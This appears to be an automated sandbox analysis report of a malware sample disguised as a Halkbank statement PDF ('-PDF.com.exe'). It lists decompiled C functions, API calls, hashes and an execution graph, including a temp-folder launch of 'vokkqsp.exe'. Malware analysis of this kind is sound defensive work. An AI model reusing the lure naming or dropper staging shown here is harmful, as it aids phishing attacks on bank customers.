                                                      0x00401cb3
                                                      0x00401cbb
                                                      0x00401cbe
                                                      0x00401cbe
                                                      0x00401ca3
                                                      0x00401d06
                                                      0x00401d09
                                                      0x00401d0f
                                                      0x00402ba4
                                                      0x00402ba4
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                      • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                      • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                      • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                      • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                      0x00406544
                                                      0x00406546
                                                      0x0040655b
                                                      0x0040655e
                                                      0x00406563
                                                      0x00406568
                                                      0x004065a6
                                                      0x004065a6
                                                      0x0040656a
                                                      0x0040657c
                                                      0x00406587
                                                      0x0040658d
                                                      0x00406598
                                                      0x00000000
                                                      0x00000000
                                                      0x00406598
                                                      0x004065ac

                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,?,?,0040679D,80000002), ref: 0040657C
                                                      • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,00422728), ref: 00406587
                                                      Strings
                                                      • ('B, xrefs: 0040655B
                                                      • "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf, xrefs: 0040653D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$('B
                                                      • API String ID: 3356406503-516527465
                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                      0x00405f38
                                                      0x00405f45
                                                      0x00405f46
                                                      0x00405f51
                                                      0x00405f59
                                                      0x00405f59
                                                      0x00405f61

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-3081826266
                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                      • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                      • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                      0x00405642
                                                      0x0040564c
                                                      0x00405668
                                                      0x0040568a
                                                      0x0040568d
                                                      0x00405693
                                                      0x0040569d
                                                      0x0040569e
                                                      0x004056a0
                                                      0x004056a6
                                                      0x004056a6
                                                      0x004056b0
                                                      0x00000000
                                                      0x004056be
                                                      0x00405675
                                                      0x004056ad
                                                      0x004056ad
                                                      0x00000000
                                                      0x004056ad
                                                      0x00405681
                                                      0x00405683
                                                      0x00000000
                                                      0x00405683
                                                      0x00405652
                                                      0x00000000
                                                      0x00000000
                                                      0x00405659
                                                      0x00000000

                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0040566D
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                        • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                      • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                      • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                      • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                      0x00405f84
                                                      0x00405f8e
                                                      0x00405f91
                                                      0x00405f97
                                                      0x00405f98
                                                      0x00405f99
                                                      0x00405fa1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405fa1
                                                      0x00405fa3
                                                      0x00405fab

                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-224404859
                                                      • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                      • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                      • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                      • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                      0x004060cd
                                                      0x004060cf
                                                      0x004060d2
                                                      0x004060fe
                                                      0x004060d7
                                                      0x004060e0
                                                      0x004060e5
                                                      0x004060f0
                                                      0x004060f3
                                                      0x0040610f
                                                      0x004060f5
                                                      0x004060fc
                                                      0x00000000
                                                      0x004060fc
                                                      0x00406108
                                                      0x0040610c
                                                      0x0040610c
                                                      0x00406106
                                                      0x00000000

                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                      • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                      • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                      • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                      • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                      • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:1.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.2%
                                                      Total number of Nodes:571
                                                      Total number of Limit Nodes:11
                                                      execution_graph 31266 402b12 31271 403345 SetUnhandledExceptionFilter 31266->31271 31268 402b17 pre_c_initialization 31272 410088 44 API calls __get_errno 31268->31272 31270 402b22 31271->31268 31272->31270 31273 402b24 31295 403097 31273->31295 31275 402b29 ___unDNameEx 31299 402e77 31275->31299 31277 402b41 31280 402b6a ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 31277->31280 31340 4031b3 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 31277->31340 31279 402b89 ___unDNameEx 31280->31279 31281 402c09 31280->31281 31341 40e041 44 API calls 4 library calls 31280->31341 31310 40dbf2 31281->31310 31288 402c30 31289 402c3a 31288->31289 31343 40e067 23 API calls __CreateFrameInfo 31288->31343 31290 402c43 31289->31290 31344 40e015 23 API calls __CreateFrameInfo 31289->31344 31345 402fee 88 API calls 2 library calls 31290->31345 31294 402c4c 31294->31279 31296 4030c7 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 31295->31296 31297 4030ba 31295->31297 31298 4030be 31296->31298 31297->31296 31297->31298 31298->31275 31300 402e80 31299->31300 31346 40345b IsProcessorFeaturePresent 31300->31346 31302 402e8c 31347 403af6 10 API calls 4 library calls 31302->31347 31304 402e91 31309 402e95 31304->31309 31348 4105e2 31304->31348 31307 402eac 31307->31277 31309->31277 31311 40dbfb 31310->31311 31313 402c1d 31310->31313 31412 40d585 31311->31412 31314 4024cf GetConsoleWindow ShowWindow 31313->31314 31476 40b316 31314->31476 31321 40b75e 78 API calls 31322 40251a VirtualAlloc 31321->31322 31491 40b9bf 31322->31491 31326 40255f RegisterWindowMessageW 31327 40257c ___scrt_fastfail 31326->31327 31328 402596 6 API calls 31327->31328 31329 402623 MonitorFromRect GetMonitorInfoW 31328->31329 31330 40261c 31328->31330 31331 402652 31329->31331 31332 40264b ExitProcess 31329->31332 31342 403301 GetModuleHandleW 31330->31342 31494 401353 7 API calls 31331->31494 31334 402657 ShowWindow UpdateWindow DragAcceptFiles GetCommandLineW LoadAcceleratorsW 31335 4026da GetMessageW 31334->31335 31336 4026e8 31335->31336 31337 402699 IsDialogMessageW 31335->31337 31336->31330 31337->31335 31338 4026ae TranslateAcceleratorW 31337->31338 31338->31335 31339 4026c4 TranslateMessage DispatchMessageW 31338->31339 31339->31335 31340->31277 31341->31281 31342->31288 31343->31289 31344->31290 31345->31294 31346->31302 31347->31304 31352 42b00e 31348->31352 31351 403b35 8 API calls 3 library calls 31351->31309 31353 42b01e 31352->31353 31354 402e9e 31352->31354 31353->31354 31357 420c63 31353->31357 31362 420d13 31353->31362 31354->31307 31354->31351 31359 420c6a 31357->31359 31358 420cad GetStdHandle 31358->31359 31359->31358 31360 420d0f 31359->31360 31361 420cc0 GetFileType 31359->31361 31360->31353 31361->31359 31363 420d1f ___unDNameEx 31362->31363 31374 4260b0 EnterCriticalSection 31363->31374 31365 420d26 31375 426493 31365->31375 31370 420d55 31370->31353 31371 420d3f 31372 420c63 2 API calls 31371->31372 31373 420d44 31372->31373 31389 420d6a LeaveCriticalSection __CreateFrameInfo 31373->31389 31374->31365 31376 42649f ___unDNameEx 31375->31376 31377 4264a8 31376->31377 31378 4264c9 31376->31378 31398 420e3c 14 API calls __get_errno 31377->31398 31390 4260b0 EnterCriticalSection 31378->31390 31381 4264ad 31399 41f16a 44 API calls __get_errno 31381->31399 31383 426501 31400 426528 LeaveCriticalSection __CreateFrameInfo 31383->31400 31384 420d35 31384->31373 31388 420bad 47 API calls 31384->31388 31385 4264d5 31385->31383 31391 4263e3 31385->31391 31388->31371 31389->31370 31390->31385 31401 4108cd 31391->31401 31393 426402 31409 41072c 14 API calls 2 library calls 31393->31409 31394 4263f5 31394->31393 31408 42aac1 6 API calls __get_errno 31394->31408 31396 426457 31396->31385 31398->31381 31399->31384 31400->31384 31406 4108da __get_errno 31401->31406 31402 41091a 31411 420e3c 14 API calls __get_errno 31402->31411 31403 410905 RtlAllocateHeap 31404 410918 31403->31404 31403->31406 31404->31394 31406->31402 31406->31403 31410 42b0c3 EnterCriticalSection LeaveCriticalSection __get_errno 31406->31410 31408->31394 31409->31396 31410->31406 31411->31404 31413 40d58e 31412->31413 31416 40d5a4 31412->31416 31413->31416 31418 40d5dd 31413->31418 31415 40d59b 31415->31416 31435 40d942 15 API calls 3 library calls 31415->31435 31416->31313 31419 40d5e6 31418->31419 31420 40d5e9 31418->31420 31419->31415 31436 424f1e 31420->31436 31425 40d606 31465 40d709 44 API calls 4 library calls 31425->31465 31426 40d5fa 31464 41072c 14 API calls 2 library calls 31426->31464 31429 40d600 31429->31415 31430 40d60d 31466 41072c 14 API calls 2 library calls 31430->31466 31432 40d62a 31467 41072c 14 API calls 2 library calls 31432->31467 31434 40d630 31434->31415 31435->31416 31437 40d5ef 31436->31437 31438 424f27 31436->31438 31442 42575e GetEnvironmentStringsW 31437->31442 31468 41ff69 44 API calls 3 library calls 31438->31468 31440 424f4a 31469 424d29 53 API calls 4 library calls 31440->31469 31443 425776 31442->31443 31444 40d5f4 31442->31444 31470 425640 WideCharToMultiByte 31443->31470 31444->31425 31444->31426 31446 425793 31447 4257a8 31446->31447 31448 42579d FreeEnvironmentStringsW 31446->31448 31471 410766 15 API calls __get_errno 31447->31471 31448->31444 31450 4257af 31451 4257b7 31450->31451 31452 4257c8 31450->31452 31472 41072c 14 API calls 2 library calls 31451->31472 31473 425640 WideCharToMultiByte 31452->31473 31455 4257bc FreeEnvironmentStringsW 31457 4257f9 31455->31457 31456 4257d8 31458 4257e7 31456->31458 31459 4257df 31456->31459 31457->31444 31475 41072c 14 API calls 2 library calls 31458->31475 31474 41072c 14 API calls 2 library calls 31459->31474 31462 4257e5 FreeEnvironmentStringsW 31462->31457 31464->31429 31465->31430 31466->31432 31467->31434 31468->31440 31469->31437 31470->31446 31471->31450 31472->31455 31473->31456 31474->31462 31475->31462 31495 40b0ef 31476->31495 31479 40b75e 31480 40b771 __chsize 31479->31480 31548 40b404 31480->31548 31485 40b031 31486 40b044 __chsize 31485->31486 31627 40a69a 31486->31627 31489 40aa21 __chsize 44 API calls 31490 40250f 31489->31490 31490->31321 31678 40b9dc 31491->31678 31494->31334 31498 40b0fb ___unDNameEx 31495->31498 31496 40b102 31520 420e3c 14 API calls __get_errno 31496->31520 31498->31496 31500 40b122 31498->31500 31499 40b107 31521 41f16a 44 API calls __get_errno 31499->31521 31502 40b134 31500->31502 31503 40b127 31500->31503 31512 420edb 31502->31512 31522 420e3c 14 API calls __get_errno 31503->31522 31504 4024fb 31504->31479 31508 40b151 31524 40b18f LeaveCriticalSection __fread_nolock 31508->31524 31509 40b144 31523 420e3c 14 API calls __get_errno 31509->31523 31513 420ee7 ___unDNameEx 31512->31513 31525 4260b0 EnterCriticalSection 31513->31525 31515 420ef5 31526 420f89 31515->31526 31520->31499 31521->31504 31522->31504 31523->31504 31524->31504 31525->31515 31534 420fac 31526->31534 31527 421004 31528 4108cd __get_errno 14 API calls 31527->31528 31529 42100d 31528->31529 31544 41072c 14 API calls 2 library calls 31529->31544 31532 421016 31535 420f02 31532->31535 31545 42aac1 6 API calls __get_errno 31532->31545 31534->31527 31534->31535 31542 41f3a9 EnterCriticalSection 31534->31542 31543 41f3bd LeaveCriticalSection 31534->31543 31539 420f3b 31535->31539 31536 421035 31546 41f3a9 EnterCriticalSection 31536->31546 31547 4260f8 LeaveCriticalSection 31539->31547 31541 40b13d 31541->31508 31541->31509 31542->31534 31543->31534 31544->31532 31545->31536 31546->31535 31547->31541 31550 40b410 ___unDNameEx 31548->31550 31549 40b416 31575 41f0ed 44 API calls 2 library calls 31549->31575 31550->31549 31552 40b44a 31550->31552 31565 41f3a9 EnterCriticalSection 31552->31565 31553 40b431 31559 40aa21 31553->31559 31555 40b456 31566 40b579 31555->31566 31557 40b46d 31576 40b496 LeaveCriticalSection __fread_nolock 31557->31576 31560 40aa2d 31559->31560 31561 40aa44 31560->31561 31625 40aab4 44 API calls 2 library calls 31560->31625 31563 402506 31561->31563 31626 40aab4 44 API calls 2 library calls 31561->31626 31563->31485 31565->31555 31567 40b58c 31566->31567 31568 40b59f 31566->31568 31567->31557 31577 40b4a0 31568->31577 31570 40b650 31570->31557 31571 40b5c2 31571->31570 31581 421c71 31571->31581 31575->31553 31576->31553 31578 40b4b1 31577->31578 31580 40b509 31577->31580 31578->31580 31590 41f88f 46 API calls 2 library calls 31578->31590 31580->31571 31582 421c8a 31581->31582 31583 40b5f0 31581->31583 31582->31583 31591 41f218 31582->31591 31587 41f8cf 31583->31587 31585 421ca6 31598 42f3ec 76 API calls 4 library calls 31585->31598 31601 41f65c 31587->31601 31589 41f8e8 31589->31570 31590->31580 31592 41f224 31591->31592 31593 41f239 31591->31593 31599 420e3c 14 API calls __get_errno 31592->31599 31593->31585 31595 41f229 31600 41f16a 44 API calls __get_errno 31595->31600 31597 41f234 31597->31585 31598->31583 31599->31595 31600->31597 31607 4267ad 31601->31607 31603 41f66e 31604 41f68a SetFilePointerEx 31603->31604 31605 41f676 __fread_nolock 31603->31605 31604->31605 31606 41f6a2 GetLastError 31604->31606 31605->31589 31606->31605 31608 4267ba 31607->31608 31609 4267cf 31607->31609 31620 420e29 14 API 